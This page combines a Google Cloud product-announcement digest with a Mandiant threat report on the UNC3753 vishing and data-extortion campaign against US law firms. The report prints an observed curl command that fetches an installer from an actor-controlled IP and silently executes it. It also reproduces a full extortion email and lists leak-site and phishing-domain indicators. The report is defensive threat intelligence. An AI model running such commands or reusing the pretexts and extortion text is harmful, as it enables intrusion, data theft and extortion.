Cloud Blog

What’s new with Google Cloud

Fri, 05 Jun 2026 16:00:00 +0000

Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more.

Tip: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: Google Cloud blog 101: Full list of topics, links, and resources.

aside_block: <ListValue: []>

Jun 1 - Jun 5

Modeling the physical world with BigQuery Graph
Managing complex supply chains requires more than just spreadsheets; it requires a digital replica of the physical world. In this post, Guru Rangavittal and Candice Chen explore how BigQuery Graph enables organizations to build a digital twin by turning physical assets into an interconnected map of nodes and edges. By moving beyond traditional relational databases, businesses gain real-time clarity into operations—from executing surgical ingredient recalls to analyzing weather-driven logistics risks. Discover how BigQuery Graph transforms reactive firefighting into proactive, precision modeling, allowing you to see critical connections in seconds and future-proof your supply chain.
Apigee for AI: Govern LLMs and MCP Servers (Presented in Spanish)
Learn how to securely transition your AI initiatives from experimental prototypes to enterprise-ready deployments. Join Luis Cuellar on June 18 for a technical deep dive (presented in Spanish) exploring Apigee’s latest AI gateway capabilities. Discover how to centralize governance over Model Context Protocol (MCP) servers, protect Large Language Models (LLMs) with robust API gateway security policies, and manage token-based quotas.

Register for the June 18 Spanish Community TechTalk

May 25 - May 29

Anthropic’s Claude Opus 4.8 is now available on Gemini Enterprise Agent Platform. As we continue to expand our platform's model offerings, this addition gives organizations more options for handling complex, multi-stage enterprise workflows. Claude Opus 4.8 brings strong capabilities in agentic coding, allowing developers to manage extensive refactors and tracking dependencies over extended sessions.
API Horizon Munich July 6, 2026: Orchestrating the Next Era of AI and APIs
Master the orchestration of next-gen AI and digital ecosystems. Join Google Cloud experts and DACH tech leaders on July 6 for an exclusive look at the Apigee roadmap, Agent Management, and Model Context Protocol (MCP). Gain real-world insights and connect with the regional integration community.

Register now
Securing AI Agents: The Extended Agent Gateway Pattern
Learn how to prevent autonomous AI agents from invoking unauthorized APIs. Join Apigee Specialist Joel Gauci on June 4 for a technical deep dive into the Extended Agent Gateway pattern. This session covers enforcing Fine-Grained Authorization (FGA), implementing secure token exchange, and establishing Model Context Protocol (MCP) governance at the API gateway layer to protect enterprise backend services.

Register for the June 4 Community TechTalk
API-to-Agent Security: Exposing REST APIs to Gemini Enterprise via MCP
Connect Gemini Enterprise agents to core data without creating security hazards. Join Google Cloud Specialist Nigel Walters on June 11 to learn how to instantly transform legacy REST APIs into secure Model Context Protocol (MCP) servers. We’ll cover how to safely register tools with Gemini while enforcing gateway-level guardrails like rate limiting and access control policies.

Register for the June 11 Community TechTalk

May 18 - May 22

Chinese Webinar | June 4: AI Command and Control
As AI agents move from experimental pilots to core enterprise functions, governance has become a critical next step. Join Google Cloud on June 4th at 10:00 AM (Beijing Time) to learn how to build a secure AI management layer architecture. We'll explore how to develop governed MCP (Model Context Protocol) endpoints, manage tool access to enterprise data, and leverage robust audit logs to operationalize AI. This session also includes a practical demonstration of these governance frameworks on Google Cloud.

Register here
GCP Announces New Features to Benchmark and Optimize LLMs for On-Device Use Cases
Deploying fine-tuned LLMs from GCP to edge devices like smartphones is complex due to fragmented hardware. Google AI Edge Portal bridges this gap, giving GCP developers the ability to test AI performance on 120+ Android devices, representing the full diversity of high, medium, and low tier smartphones on the market today. This week at I/O, we announced brand new capabilities to benchmark and debug LLM performance across these devices. Sign-up to utilize these new features in private preview today.

May 11 - May 15

Build Your AI & MCP Control Tower for Universal Governance
Master the future of agentic security with Apigee. Join our Community TechTalk on May 21 to discover how Apigee serves as a central "Control Tower" for the Model Context Protocol (MCP). We will explore how new JSON-RPC tool authorization enables fine-grained access policies across your organization, ensuring secure and scalable AI deployments. Whether managing internal tools or external users, learn to govern your agentic ecosystem with absolute precision. This session is designed for global coverage across EMEA and AMER regions.

Register for the May 21 Community TechTalk

Apr 27 - May 1

Master Your Launch: The Apigee Production Go-Live Checklist
Ensure a secure launch with the Apigee production guide. Join Nicola Cardace on May 28 to explore security guardrails, including IAM roles, mTLS configurations, and encrypted KVM migrations. Scheduled at 11 AM EDT / 5 PM CEST to support EMEA and AMER teams, this TechTalk provides the technical roadmap you need to flip the switch with absolute confidence.

Register for the May 28 Community TechTalk
Transforming APIs into Governed Agentic Tools on the Google Cloud Agentic Platform
Turn your APIs into secure, governed agentic tools on the Google Cloud Agentic Platform. Join Specialist Christophe Lalevée on May 7 for a technical deep dive into AI productization. Scheduled at 5 PM CEST / 11 AM EDT to maximize coverage for developers across EMEA and AMER, this session explores the integration and governance frameworks required to scale enterprise-ready AI with confidence.

Register for the May 7 Community TechTalk
Fractional G4 VMs are Generaly Available, providing a highly efficient and cost-effective entry point for AI and graphics workloads. These new configurations, using NVIDIA virtual GPU (vGPU) technology, allow you to leverage the power of the NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs in flexible, smaller increments, so you can right-size your infrastructure to match the specific demands of your applications. By providing more granular access to advanced hardware, fractional G4 VMs let you optimize resource allocation and reduce overhead without sacrificing performance. You can now select from additional GPU slice sizes for your specific needs:
- 1/2 GPU: Ideal for more intensive tasks such as LLM inference, robotics sensor simulation, and high-fidelity 3D rendering.
- 1/4 GPU: Optimized for mainstream workloads, including mid-range creative design, video transcoding, and real-time data visualization.
- 1/8 GPU: Great for lightweight applications such as remote desktops, productivity tools, and entry-level streaming services.
Transitioning AI from a sandbox prototype to an enterprise-grade system is a major hurdle. A monolithic script won't suffice for widespread deployment. To achieve true scale and reliability with Gemini, organizations must adopt service-oriented micro-agent architectures, establish Zero-Trust security, and implement rigorous EvalOps. Master the "Agentic Maturity Ladder" to ensure your AI & Agentic solutions are robust, secure, and ready for the real world.

Watch the deep dive and read the developer blog to learn more.
ML Development in VS Code with Google Cloud Power: Workbench Extension Now Available
Data scientists and developers can now combine the local productivity of VS Code with the scalable infrastructure of Google Cloud. The new Google Cloud Workbench Notebooks extension allows you to connect to and run notebooks on managed cloud environments directly within your local IDE. This integration streamlines the ML lifecycle by eliminating context switching and providing high-performance compute for complex workloads in a familiar interface. As part of our commitment to the developer ecosystem, the extension is fully open-sourced to support community-driven innovation.
- Install from Marketplace: GoogleCloudTools.workbench-notebooks
- Contribute on GitHub: colab-enterprise-vscode

Apr 20 - Apr 24

Announcing the 2026 Google Cloud Partners of the Year
Google Cloud is honored to celebrate the winners of the 2026 Partner of the Year awards! These awards recognize an exceptional group of partners across AI, Security, Infrastructure, and more, who have demonstrated a commitment to customer success. From global system integrators to specialized startups, these winners are leveraging the power of Google Cloud to solve complex challenges and drive digital transformation worldwide. Join us in congratulating these organizations for their innovation, collaboration, and impactful results over the past year.

See the 2026 Partner Award winners

Apr 13 - Apr 17

We're excited to announce the Public Preview of Datastream’s metadata integration with Knowledge Catalog. This is the first step in our vision to provide a centralized, "single pane of glass" for all Datastream assets. The enhancement automatically synchronizes Streams, Connection Profiles, and Private Connections, eliminating data silos. It enhances discoverability, allowing you to search for Datastream assets using the same interface as BigQuery tables. Centralized governance is also provided, making your real-time data estate more transparent and easier to manage.
Upgrading Apigee OPDK to 4.53 with OS Modernization
Modernize your infrastructure using Google’s official, sequential upgrade path. Our Technical expert, Rakesh Talanki outlines how to upgrade Apigee OPDK to v4.53 while migrating to a supported OS (RHEL 8.x/9.x). This guide covers the "build-out" methodology, including multi-data center syncing, to ensure a stable, zero-downtime transition

Read the guide
Cloud Run Worker Pools and CREMA: Powering Serverless AI at Scale
Google Cloud has announced the General Availability of Cloud Run worker pools, a new resource type designed specifically for pull-based, non-HTTP workloads. Unlike traditional Cloud Run services that scale based on request traffic, worker pools provide an "always-on" environment for background tasks like processing message queues or running large-scale AI inference. To support this, Google Cloud also open-sourced the Cloud Run External Metrics Autoscaler (CREMA). Built on KEDA, CREMA enables queue-aware autoscaling for worker pools, allowing them to dynamically scale based on external signals like Pub/Sub backlog or Kafka lag.
Apigee Model Context Protocol (MCP) now Generally Available
Expose enterprise APIs as MCP tools for agentic AI applications with the General Availability of MCP in Apigee. This update allows developers to transform APIs into AI-ready tools using OpenAPI Specifications, removing the need for local MCP servers or additional infrastructure. With managed endpoints and semantic search in API hub, you can now provide AI agents with secure, governed access to enterprise data at scale.

Explore the MCP overview

Apr 6 - Apr 10

Community TechTalk: Powering Retail Agents with ADK, UCP & Apigee X
Move beyond basic chatbots to secure, transactional AI experiences. Join our Community TechTalk on April 16 to learn how Apigee X and Gemini build a "Trust Layer" for AI shopping assistants using UCP standards. We’ll demonstrate how to block prompt injections with Model Armor and implement cost governance via token limits to secure the path from discovery to purchase.

Register for the TechTalk
Implement multimodal capabilities in your AI agents
Explore three new reference architectures for building sophisticated multi-agent AI systems that can process and analyze multimodal data. To analyze disparate multimodal data and produce a high-confidence classification, see Classify multimodal data. To create a fluid conversational AI that processes audio and video streams in real time, see Enable live bidirectional multimodal streaming. To consolidate fragmented multimodal data into a searchable knowledge graph, see Multimodal GraphRAG resource orchestration.
Automate SecOps workflows with an agentic AI system
To accelerate incident response and reduce manual toil for your security team, you need a system that can automate remediation playbooks. Our new reference architecture helps you build an AI agent that orchestrates complex triage and investigation workflows across disparate security tools, such as SIEM, CSPM, and EDR, from a single interface. See the full guide to orchestrate security operations workflows.

Mar 30 - Apr 3

ASEAN Webinar | April 30: Mastering Agentic Governance at Scale with GCP
As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud experts Shilpi Puri & Wely Lau for a webinar on April 30th at 11:00 AM SGT to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.

RSVP here.

Mar 23 - Mar 27

Turn your API sprawl into an agent-ready catalog
As organizations scale, APIs often become scattered across multiple gateways, creating "blind spots" that hinder AI adoption. To solve this, we’ve introduced two new capabilities for Apigee API hub: a new integration with API Gateway to automatically centralize API metadata into a single control plane, and a specification boost add-on (now in public preview). This add-on uses AI to enhance your API documentation with the precise examples and error codes that AI agents need to function reliably.

Read the full blog post to get started.
Webinar | April 16: AI Command & Control
As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud expert Satyam Maloo for a webinar on April 16th at 11:00 AM IST to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.

RSVP here.
Modernizing and Decoupling Event Ingestion with Apigee
In modern cloud-native architectures, decoupling producers from consumers is critical for building resilient systems. While Google Cloud Pub/Sub provides a scalable backbone, exposing it directly to external clients can introduce security and management overhead. This new guide explores how to leverage Apigee as an intelligent HTTP ingestion point. Learn how to handle security, mediation, and traffic control before messages reach your internal bus using the PublishMessage policy or Pub/Sub API.

Read the full guide.

Mar 16 - Mar 20

Gemini-powered Assistant in BigQuery Studio Gets Context-Aware Upgrades
The Gemini-powered assistant in BigQuery Studio has been transformed into a fully context-aware analytics partner, supporting your entire data lifecycle. The new capabilities include intelligent resource discovery, which uses Dataplex Universal Catalog search to find resources across projects and deep dive into metadata using natural language. You can now automate tasks, such as scheduling production-grade queries directly through the chat interface, and instantly troubleshoot long-running or failed jobs with root cause analysis and cost control auditing.

Explore the full range of what the assistant can do.

Mar 9 - Mar 13

Want to use Gemini to develop code and don't know where to start?
This article includes a couple of examples of developing code with Gemini prompts; it identified changes that were needed to be made to get the code working. The article also refers to other examples that are available on github.

Mar 2 - Mar 6

Introducing Gemini 3.1 Flash-Lite, our fastest and most cost-efficient Gemini 3 series model. Built for high-volume developer workloads at scale, 3.1 Flash-Lite delivers high quality for its price and model tier. Gemini 3.1 Flash-Lite can tackle tasks at scale, like high-volume translation and content moderation, where cost is a priority. And it can also handle more complex workloads where more in-depth reasoning is needed, like generating user interfaces and dashboards, creating simulations or following instructions.

Starting today, 3.1 Flash-Lite is rolling out in preview to enterprises via Vertex AI and developers via the Gemini API in Google AI Studio.
TechTalk: Implementing Device Authorization Grant (RFC 8628) for Apigee
Learn how to authorize "headless" devices like Smart TVs or AI agents that lack keyboards and browsers. Join our Community TechTalk on March 19 (5PM CET / 12PM EDT) to go under the hood of Apigee X/Hybrid. We’ll cover the real-world mechanics of state management, polling, and human-in-the-loop security patterns for devices and autonomous agents.

Register for the TechTalk

Feb 23 - Feb 27

Pro-level image generation gets faster and more accessible with Nano Banana 2
Nano Banana 2 is our state-of-the-art image generation and editing model. It delivers Pro-level image generation and editing at the speed you expect from Flash — making the quality, reasoning, and world knowledge you loved about Nano Banana Pro more accessible. Learn more about the model here.

The Intelligent Path to Compliance: Transforming Regulatory QC with Google Cloud
Reducing "Refuse to File" (RTF) risks and submission cycle times is critical for life sciences leaders. Google Cloud’s Regulatory Submission Semantic QC Auditor leverages Gemini and RAG architecture to transform Quality Control from a manual burden into an active, intelligent workflow.

By automating semantic cross-referencing, narrative coherence checks, and dynamic guidance-based auditing, this solution ensures rigorous accuracy and auditability. Operating within a secure GxP-ready environment, it empowers teams to detect subtle inconsistencies and generate remediation plans without sacrificing data privacy.

Learn more.
Stop typing, start interacting! The Gemini Live Agent Challenge is here. Build immersive agents that can help you see, hear, and speak using Gemini and Google Cloud. Compete for your share of $80,000+ in prizes and a trip to Google Cloud Next '26!

Submissions are open from February 16, 2026 to March 16, 2026. Learn more and register at geminiliveagentchallenge.devpost.com

Feb 9 - Feb 13

Introducing Gemini 3.1 Pro on Google Cloud.
3.1 Pro is a noticeably smarter, more capable baseline for complex problem-solving. We’re shipping 3.1 Pro at scale, building upon our goal to help you transform your business for the agentic future. Learn more about the model’s capabilities here. Gemini 3.1 Pro is available starting today in preview in Vertex AI and Gemini Enterprise. Developers can access the model in preview via the Gemini API in Google AI Studio, Android Studio, Google Antigravity, and Gemini CLI.
Automate Storage Compatibility with GKE Dynamic Default Storage Classes
Managing storage across mixed-generation VM clusters in GKE just got easier. With the new Dynamic Default Storage Class, Google Kubernetes Engine automatically selects between Persistent Disk (PD) and Hyperdisk based on a node's specific hardware compatibility. This abstraction eliminates the need for complex scheduling rules and manual pairing, ensuring your volumes "just work" regardless of the underlying infrastructure. By defining both variants in a single class, you reduce operational overhead while maintaining peak performance and cost-efficiency across your entire cluster.

Explore automated disk type selection
Community TechTalk: AI-Powered Apigee Development with strofa.io
Join the Apigee community on February 26 for a deep dive into strofa.io. Guest speaker Denis Kalitviansky will demonstrate how this new AI-powered tool automates and orchestrates Apigee development, from local emulators to large-scale hybrid environments. Discover how to scale your API management and streamline team collaboration using the latest in AI-driven automation.

Register now to reserve your spot.

Jan 26 - Jan 30

Simplify API Governance with Native OpenAPI v3 Support
Eliminate integration debt and accelerate deployment velocity with the General Availability of OpenAPI v3 (OASv3) support for API Gateway and Cloud Endpoints. You no longer need to downgrade modern specifications to OASv2. Instead, you can now define API contracts and enforce critical policies—including telemetry, quotas, and security—using native Google-specific extensions directly within your OASv3 files. This update ensures your APIs are secure by design while remaining fully compatible with the modern developer ecosystem and Google Cloud’s AI services.

Get started with OpenAPI v3 on API Gateway and Cloud Endpoints.

Accelerate API Testing with the New Open Source API Tester
Start validating your APIs with API Tester, a simple, YAML-based Test Driven Development (TDD) framework. Designed for the Apigee community, this tool allows you to write human-readable tests, run them instantly via a web client or CLI, and perform deep unit testing on Apigee proxies. With native support for JSONPath assertions and Apigee shared flows, you can verify everything from payload data to internal variables like proxy.basepath without leaving your terminal.

Explore the API Tester guide and start testing your proxies today.
Secure Sensitive Data with Kubernetes Secrets in Apigee hybrid
Enhance security in Apigee hybrid by accessing Kubernetes Secrets directly within your API proxies. This hybrid-exclusive feature keeps sensitive credentials within your cluster boundary and prevents replication to the management plane. It supports strict separation of duties: operators manage secrets via kubectl, while developers reference them as secure flow variables—ideal for high-compliance and GitOps workflows.

Implement Kubernetes Secrets in your hybrid proxies.
See the Console in a Whole New Light: Dark Mode is Now Generally Available in Google Cloud
Elevate your cloud management workflow with Dark Mode, now generally available in the Google Cloud console. We have delivered a modern, cohesive, and accessible experience reimagined for maximum comfort and productivity—especially during extended working hours and low-light environments. Dark Mode can be enabled automatically based on your operating system's preference, or manually through the Settings -> Appearance menu.

Switch to Dark Mode today to enjoy a modern, comfortable, and productive environment!
Apigee X Networking: PSC or VPC Peering?
Deciding how to connect Apigee X? Watch this video to compare Private Service Connect and VPC Peering. We break down northbound and southbound routing, IP consumption, and how to reach targets on-prem or in the cloud. Learn to simplify your architecture and avoid common networking "gotchas" for a smoother deployment.

Watch the video.

Jan 19 - Jan 23

Bridge the Gap: Excel-to-API Conversion in Apigee Portals
Give your customers more ways to connect! This new article by Tyler Ayers explores how to extend the Apigee Integrated Portal to support direct Excel file uploads. By leveraging SheetJS and custom portal scripts, you can enable users to upload spreadsheets, preview data, and submit it directly to your APIs, all without writing a single line of integration code themselves. It’s a powerful way to simplify onboarding for those who aren't yet API-ready.

Learn how to build it.
Elevate your applications with Firestore’s new advanced query engine
We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.

Learn more about Firestore pipeline operations.

Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms

Fri, 05 Jun 2026 14:00:00 +0000

Written by: Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan

Introduction

From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," “Chatty Spider,” and "Silent Ransom Group") targeting dozens of organizations across professional, legal, and financial services in the United States.

UNC3753 leverages voice phishing (vishing) and social engineering deception techniques to achieve remote access into corporate environments. Using pretexts such as data migration or invoice related emails, the threat actors initiate phone conversations posing as IT support and convince targets to host screen-sharing sessions and download remote monitoring and management (RMM) utilities. Once inside the environment, the threat actors either directly conduct searches to locate and exfiltrate highly sensitive data, or manipulate the victim into executing these actions on their behalf. This data typically includes proprietary legal agreements, personally identifiable information (PII), and financial records for subsequent extortion demands.

Notably, in instances possibly linked to UNC3753, threat actors have accessed victims' systems in person. In these physical incidents, individuals posing as IT technicians entered corporate offices to attempt direct exfiltration of data from an endpoint using USB storage media.

This blog post details the threat group's technical lifecycle across recent Mandiant Consulting incident response engagements, highlights tactics like physical office targeting, and provides actionable recommendations to safeguard endpoints and infrastructure.

Threat Detail

The UNC3753 campaign lifecycle reflects an optimized, fast-tempo operational model. In many Mandiant investigated incidents, the entire attack sequence—from initial target contact to data theft and extortion—occurred within a single business day. Recently, Mandiant observed data searches, staging, and theft initiated in under an hour.

The threat group frequently initializes campaigns using benign, invoice-themed email lures sent from actor-controlled consumer email accounts. These messages contain no active links or malicious attachments. Instead, they typically contain a brief, generic message for example: “hello, here is the invcoie we talked about yesterday”. Google Threat Intelligence Group (GTIG) assesses that the primary purpose of these emails is to establish a pretext, raising the target's internal security concerns so they are more susceptible to follow-up voice calls.

Figure 1: UNC3753 attack lifecycle

Initial Access via IT Helpdesk Impersonation

The core of UNC3753's entry mechanism relies on targeted vishing. Mandiant has observed the group targeting personnel across all seniority levels, who are often publicly listed on the organization’s websites, to harvest phone numbers and email addresses. Acting as members of the organization's internal IT helpdesk or security team, threat actors place direct calls to these employees.

The callers use a variety of verbal instructions to guide target behavior. Under the guise of addressing a security issue or aiding with a corporate data migration project, they build trust and direct the target to join a screen-sharing session.

Remote Screen Control and Legitimate Tool Abuse

Once the target is engaged, the threat actors bypass conventional automated boundary security and email filtering controls by instructing the user to download and execute screen-sharing applications.

Screen-Sharing Utilities

UNC3753 instructs targets to initiate remote desktop and support sessions using built-in or commercial services, including Zoom, Microsoft Terminal Services, Microsoft Teams, and Quick Assist. During a Teams-facilitated intrusion, the threat actor held five distinct calls with the same target over a three-day period.

Commercial RMM Agents

UNC3753 frequently attempts to establish more persistent access by social engineering targets into downloading AnyDesk, Bomgar, or Zoho Assist installers. In one engagement, the threat actor attempted to install a "SuperOps RMM agent" by convincing the target to download and execute a payload via a cURL command.

Message Delivery via Privnote

Threat actors consistently utilize privnote[.]com, a web-based, self-destructing text utility, to transmit installation links and commands to targets. This evasion technique ensures that copy-paste vectors leave no permanent footprint on endpoint browsers or chat logs.

Example cURL command staging string observed in UNC3753 remote sessions:

curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet

Infrastructure Pivoting and Local Staging

Intrusions have abused Bring Your Own Device (BYOD) remote environments to access internal enterprise assets. In separate Mandiant Consulting cases, UNC3753 established Zoom sessions directly on targets' personal BYOD endpoints. Using these compromised personal laptops, they accessed corporate virtual desktop infrastructure (VDI) using native client platforms, such as Windows 365 (Windows365.exe) or Citrix clients.

Once VDI environment access is secured, the threat actors pivot to corporate file systems:

System Enumeration: The threat actors map local directories, enumerate active OneDrive folders, and crawl mapped network drives.
Document Management Targeted Harvesting: Threat actors target specific legal and document storage repositories.
Keyword Search and File Staging: Threat actors use specific keyword search functions within iManage to locate highly sensitive folders containing tax logs (Forms W-2, W-9, and 1099), audit files, corporate client agreements, and Social Security numbers (SSNs). Staged results are compiled and sorted within target-accessible subdirectories, primarily inside the user's Downloads folder or native Roaming profile path.

Data Theft

UNC3753 exfiltrates the staged data using a variety of methods to bypass security controls. They frequently use portable versions of WinSCP or Rclone. In other instances, they simply log into a threat actor-controlled consumer file sharing account directly within the victim's web browser and batch upload the stolen files.

Cloud Storage Staging: Threat actors instruct targets—or directly control their screens—to drag and drop staged folders into threat actor-controlled consumer file sharing accounts. In several intrusions, the exfiltration destination included folders explicitly renamed to mimic the victim organization's branding.
FTP Utilities: When browser-based uploads are restricted by endpoint controls, threat actors download FTP and SFTP client binaries, primarily WinSCP, to exfiltrate bulk packages. In one incident, the threat group exfiltrated 1.7 gigabytes of data from a target's local OneDrive folder to a Google Drive account before pivoting to a VDI session and exfiltrating an additional 14.4 gigabytes using WinSCP. Google has taken action against this actor by disabling the Drive accounts and assets associated with this activity.
Email Forwarding: The threat actors have also had victims stage files from internal iManage repositories and instructed them to send the files to threat actor-controlled consumer email addresses from the target's mailbox.

Threat Actor Extortion Tactics

The threat cluster delivers unbranded extortion communications via email shortly after successfully stealing data, often within 30 minutes of exiting the target environment.

These highly aggressive extortion letters give organizations a three-day deadline to respond and initiate ransom negotiations. If the victim organization is unresponsive, the threat actors declare they will call and email target employees and external clients directly to alert them of the data breach. The extortion letters explicitly emphasize that the leak will compromise client trust, invite substantial regulatory fines, and suggest that external clients sue the victim organization for data mishandling. Additionally, as part of a follow-on message the group has threatened to publish all exfiltrated archives on the LEAKEDDATA data leak site (DLS).

Sample Extortion Email

Subject: [Victim Name] has lost confidential data of their clients. Very Important!

Hello,

We have to inform you that we got access to the [Victim Name] corporation's database and took a very large dataset. We have been in your network for weeks in multiple systems , aiming for proprietary and confidential files, and were able to obtain what We were looking for as well as the data of many clients. <mentions the general nature of the stolen documents>. This is not a joke or a scam.

This is a real problem that puts the existence of your firm in danger and to prove it We have attached screenshots that are confirming the possession of the files.

Reply to Our email and We will show you the complete file tree and actual files.

We are an elite group who's been in this business for a very long time, We have Our own website where We post the data and thousands of individuals follow Our work , and connections in different business social media. But, what's more important, is that We want to return your data peacefully and as soon as possible.

We will guarantee you the complete database deletion from Our servers, video evidence of us deleting the files, privacy of our communication and Our security advice with an explanation of how We got into your network and how to fix the vulnerability that We found.

In order for us to solve this problem you need to send us an email and start communicating with us. We hope to find a financial solution that will be acceptable for both parties.

In case of ignorance or no agreement, We will notify your employees, partners and customers, after which We will publish your data. You will receive claims from individuals, and legal entities for information leakage and breach of contracts, your current deals will be terminated. Journalists and others will dig into your documents, finding inconsistencies or violations in them. Your organization will lose its reputation, shares will fall in price, and your organization will be forced to close.

Let us remind you that your data can be used by many other hackers and criminals on the dark web as well as your competitors and enemies in case We leak the data.

Law enforcement will not help you, We are out of their jurisdiction, and We already took all the critical data. They will only tell you not to communicate with us and be the first ones to fine you.

As soon as you reach out, We will show you all the files that We obtained, so you can understand the seriousness of this problem and the necessity to proceed to the negotiations.

Our communication will stay 100% private before and after the agreement. We can show the proof of it as well.

All further communication can be done through this email address.

Do not waste any time as it is ticking . Text us today, so We don't have to start calling your employees tomorrow. You will have 3 days to start communicating.

Here We attached some screenshots confirming all the above. Respond to this email and We will send you the file tree.

Figure 2: UNC3753 extortion note example

Data Leak Site

Figure 3: LEAKEDDATA DLS (partially redacted; cropped)

Suspected UNC3753 Activity Involving Physical Access

While UNC3753 primarily relies on digital vectors, GTIG assesses that associated threat actors have also attempted direct data theft using physical, in person access. This escalating tactic is corroborated by a recent FBI Cyber FLASH Alert highlighting instances where Silent Ransom Group threat actors leveraged physical office access to exfiltrate corporate data via removable USB media.

According to the FBI advisory, if remote social engineering attempts fail, actors will send an individual to a victim's physical location. The onsite threat actor will claim they need to image the device or create local backups to address a security issue. Once they gain access to the endpoint, they attempt to exfiltrate corporate data directly to an external drive.

Although limited forensic evidence and the absence of a subsequent extortion attempt prevent formal attribution, GTIG assesses that these physical intrusions are likely associated with UNC3753 based on structural, timeline, and targeting overlaps.

Attribution

GTIG attributes this campaign and related social engineering operations to UNC3753 based on infrastructure overlaps, domain registrar tracking, victimology, and target staging directories. UNC3753 (aliases: "Luna Moth," “Chatty Spider,” and "Silent Ransom Group (SRG)") is a financially motivated threat cluster active since at least March 2022. UNC3753 has TTP overlaps with UNC2686, a threat cluster that conducted "Bazarcall" style campaigns dating to early 2021. UNC3753 deployed LOCKBIT.BLACK in 2022, but has since prioritized data theft extortion-only operations typically involving threats to post stolen files to the LEAKEDDATA DLS. The threat cluster relies heavily on Remote Monitoring and Management (RMM) tools, unlike UNC2686 which deployed BAZARLOADER variants as well as TRICKBOT, URSNIF, and SILENTNIGHT. Initially, UNC3753 used subscription-themed billing email lures (such as fake software renewal alerts), typically with PDF attachments containing phone numbers for actor-controlled call centers. Beginning around March 2025, the cluster shifted tactics to pose as internal corporate IT helpdesk staff.

Remediation and Hardening

To mitigate the risk of voice phishing, physical office intrusions, and unauthorized endpoint control, GTIG recommends that organizations implement the following mitigation controls:

User Education

Conduct user awareness training specifically tailored to UNC3753 tactics, techniques, and procedures.

Physical Access and Verification Policies

Implement rigid out-of-band identity verification controls for all external contractors, technical staff, and facilities visitors. Mandate the following physical controls:

Require visitors to display official credentials and photo identification.
Require front-desk staff to copy and log all physical visitor IDs before granting access.
Verify the arrival of all technicians against pre-scheduled work orders directly with the verified parent organization or helpdesk dispatcher.
Enforce a policy requiring physical technical service personnel to be escorted by a corporate supervisor at all times.

Remote Access Conditional Access Controls

Implement remote access conditional access policies to ensure only corporate owned devices can authenticate to Virtual Desktop Instance (VDI) or Virtual Private Network (VPN) devices. This facilitates increased organizational control and visibility for potential Remote Monitoring and Management usage.

Enforce Strict RMM and Screen-Sharing Software Controls

Audit corporate environments to block the installation and execution of unauthorized remote monitoring, management, and support utilities. Enforce application control policies (e.g. Windows Defender Application Control or third-party endpoint protection tools) to restrict execution of non-approved binaries. Organizations may also consider restricting interactive screen-control features within authorized virtual meeting platforms like Zoom and Teams.

Endpoint Removable Media Hardening

To neutralize physical exfiltration vectors, disable read/write capabilities for all external USB mass storage devices. Enforce Group Policy Objects (GPOs) or MDM configurations to restrict:

USB storage device installation.
Removable media access.
Optical media writes on all corporate endpoints and BYOD systems utilizing VDI entry.

Network Monitoring and Egress Control

Monitor firewall logs, network flows, and endpoint execution logs for indicative exfiltration and staging actions. Specifically:

Block or alert on outbound connections to unauthorized file-sharing APIs and emails.
Ensure full session logging with bytes transferred is enabled within Firewall log configurations.
Monitor SSH traffic (Port 22) from internal VDIs and endpoints for high-volume WinSCP and Rclone transfers.

Application Log and Access Auditing

Review authentication and access metrics for critical document stores to identify bulk harvesting profiles.

Configure real-time alerts in iManage, SharePoint, and corporate email directories for rapid file searches, search-term spikes, and mass file downloads.
Implement multi-factor authentication (MFA) on business critical data repository applications, such as iManage.
Implement strict BYOD authentication controls, requiring MFA step-up queries when accessing VDI nodes.

Outlook and Implications

The targeting of US legal and professional services organizations by financially motivated actors is a persistent industry risk. Legal services firms represent high-value targets for extortion actors. They maintain concentrated repositories of extremely sensitive client transaction files, merger and acquisition plans, client trade secrets, and corporate regulatory reports. Threat groups recognize that legal entities are subject to heavy reputational and regulatory exposure and may be highly motivated to resolve extortion situations quietly to protect their professional standing.

Threat actors recognize that targeting the human element—specifically using voice-guided social engineering—enables them to easily bypass robust technical perimeters, web security gateways, and MFA configurations.

Finally, the integration of in-person, physical intrusions represents an escalation in threat capability. While log-based defenses and endpoint telemetry have matured, physical corporate boundaries are frequently protected only by administrative procedures. Organizations must transition to a unified security posture that treats physical facility access control and endpoint-based hardware policies as equal components of their defensive perimeter.

Data Leak Site (DLS)

UNC3753 utilizes the following web platform to disclose the identities of victims and their compromised data.

hxxps[:]//business-data-leaks[.]com

Phishing Domains

GTIG identified infrastructure registrations by suspected UNC3753 actors utilizing specific naming conventions, assessed as supporting their ongoing social engineering and vishing activities.

<organization>-itdesk[.]com
<organization>-it[.]com
<organization>-helpdesk[.]com

Indicators of Compromise (IOCs)

To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.

IOC Type	Indicator
IPv4 Address	192.236.147.131
IPv4 Address	192.236.147.138
IPv4 Address	193.141.60.212
IPv4 Address	192.236.154.158
IPv4 Address	192.236.146.173
IPv4 Address	174.169.162.62
IPv4 Address	64.94.84.97

Google Security Operations (SecOps)

Google SecOps customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:

Execute MSI Files Downloaded via Curl
Suspected Rclone Exfiltration

MITRE ATT&CK

